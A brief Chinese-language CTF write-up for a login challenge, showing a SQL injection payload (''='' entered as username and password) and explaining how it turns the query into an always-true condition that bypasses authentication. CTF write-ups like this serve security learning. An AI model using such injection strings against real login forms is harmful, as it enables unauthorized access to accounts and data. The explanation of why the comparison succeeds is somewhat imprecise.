实验吧CTF 登陆一下好吗??解题WriteUp

这个CTF​题目的payload真的简单到淫荡，看一下就是这样的

admin-> ‘=’

password-> ‘=’

真是醉了，为什么呢，类似这样的语句

$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;

如果我们按照上面输入就成了

$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;

user=”返回的是NULL=”也是符合条件的，最后就是

$sql = “select user from flag where 1 and 1”;